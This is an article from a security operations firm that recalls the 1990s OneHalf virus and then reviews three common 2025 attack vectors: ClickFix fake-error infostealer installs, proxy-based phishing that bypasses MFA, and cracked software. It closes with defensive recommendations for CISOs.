“Dis is one half.” – this message appeared on many home computer screens in the 1990s. Owning a 486 PC was not cheap for many, and this message—indicating that the computer had been taken over by a malicious virus—triggered waves of fear and panic among less technically savvy users.
The legendary OneHalf virus originated in Slovakia and became widely known worldwide under several names, most notably the “Slovak Bomber.” OneHalf secretly and quietly encrypted data on your HDD. An unsuspecting user only became aware of the intruder once the virus had encrypted half of the hard drive and boldly displayed the now-iconic message.
OneHalf is emblematic of an era in cybersecurity when viruses spread via email attachments, files, or document macros, and defense relied on antivirus software, firewalls, and basic hygiene. Updates were an ordeal in themselves, but when a system was “up to date,” it stood a good chance of managing the risk. Attacks were less widespread, and attackers were not as heavily motivated by fast financial gain as they are today.
Today, attacks have shifted from infrastructure to identity and the user. Hackers are no longer trying to bypass technical controls—they are leveraging them. They work with legitimate tools, trusted visuals, and precisely timed execution. The target is the (un)conscious decision of a person who has valid permissions, functional MFA, and access to sensitive data.
In our Security Operations Center (SOC) , we observed last year that most incidents originated at the endpoint or directly from the user’s identity.“Fake system errors, man-in-the-middle techniques capable of bypassing MFA, and unauthorized software introduced directly by the user became the dominant entry points for compromise,” evaluates the past year in cybersecurity Ján Andraško, CEO of Binary Confidence. These three scenarios were among the most frequent and most problematic attack vectors of 2025.
ClickFix and the silent installation of infostealers
One of the most successful current scenarios is the so-called ClickFix. In this case, the attacker does not try to scare the user or overwhelm them with technical detail. On the contrary, they present themselves as a solution to a problem. Typically, this involves a fake notification about a system error, a security incident, or a critical application failure. This trick is often visually enhanced with the well-known Windows “blue screen of death,” which appears especially credible to less technical users.
By following the instruction offered by the “error message,” the user triggers the installation of malicious code—most commonly an infostealer. This type of malware focuses on stealing login credentials, cookies, session tokens, or stored browser passwords. The user believes they have done the right thing by fixing the issue. Detection only occurs once compromised accounts begin to be misused. Companies without an active SOC often discover the problem far too late.
2. Next-gen phishing and MFA bypass
Phishing is (almost 😊) as old as ARPANET, but its form has evolved significantly. In 2025, we are seeing the use of man-in-the-middle proxy tools such as Evilginx and similar frameworks. These can relay communication between the victim and a legitimate service in real time. Phishing-as-a-service now enables even less technically skilled actors to launch professional campaigns with fake websites that are indistinguishable from the originals for a trivial cost.
The user enters their credentials on a fake site that perfectly mimics the legitimate one. They may even successfully pass multi-factor authentication. However, the attacker captures authentication tokens in the background and gains full access to the account without needing further verification. From a defense perspective, this is one of the most dangerous trends, as it undermines the false sense of security based solely on MFA.
3. Unauthorized and infected software as an entry point
The third recurring scenario was the installation of unauthorized software. Most commonly, this included cracked versions of commercial tools, graphic editors such as Adobe Photoshop, as well as game modifications, cheats, or add-ons for popular games like Roblox. The common denominator is bypassing licensing restrictions and security controls.
Such software is an ideal carrier for malicious code. Users expect antivirus or other security solutions to raise alerts, so they consciously ignore warnings or disable them altogether. For attackers, this becomes an open gateway into the system—and often into the corporate network. In SOC practice, we often encounter cases where compromise originated on a device that formally met security policies but was in reality running unauthorized and infected software.
Extra workload or a necessary gold standard?
For CISOs and IT teams, it is crucial to accept that most modern incidents do not arise from technology failure, but from human (unintentional) error—while the technology functions exactly as designed. Defense must therefore be built around identity, behavior, and context, not just the perimeter.
Ján Andraško, CEO of Binary Confidence, emphasizes that “consistent application of zero trust principles, continuous verification of identity, device, and access context is fundamental. MFA should not be seen as a final solution, but as one of several layers.” The recommended standard is phishing-resistant MFA combined with conditional access based on geolocation, device posture, and user behavior.
A key pillar is endpoint protection that goes beyond the traditional EDR model. In an environment where users can independently execute infostealers or introduce unauthorized software, it is critical to combine EDR with application whitelisting, script execution control, and “deny by default” policies. From an SOC perspective, the ability to quickly correlate endpoint signals with identity activity is essential—for example, detecting an unusual login shortly after a suspicious process execution.
Do not underestimate privilege management
Unauthorized software is primarily seen as a licensing and compliance issue. What is often overlooked is that it can also represent a fully-fledged attack vector. The solution lies in centralized approval processes, clearly defined exceptions, and technical enforcement of policies. The principle of least privilege should not apply only to administrative accounts. No employee should be able to install software without the knowledge of the IT department.
From a security management perspective, regularly testing reality is also critical. Simulated phishing campaigns,. Simulované phishingové kampane, tabletop exercises, and purple team activities help reveal where theoretical policies diverge from actual user behavior and SOC response capabilities. For CISOs, this is also a powerful tool for communicating risk to executive leadership.
The golden standard for 2026 is therefore layered defense, combining technology, processes, and people. Organizations that can integrate identity, endpoint, and SOC into a single decision-making framework have a significantly higher chance not only of detecting an attack, but of stopping it before it escalates into a crisis with real business impact.
The project funded through grant agreement number 101145856 is supported by the European Cybersecurity Competence Centre.
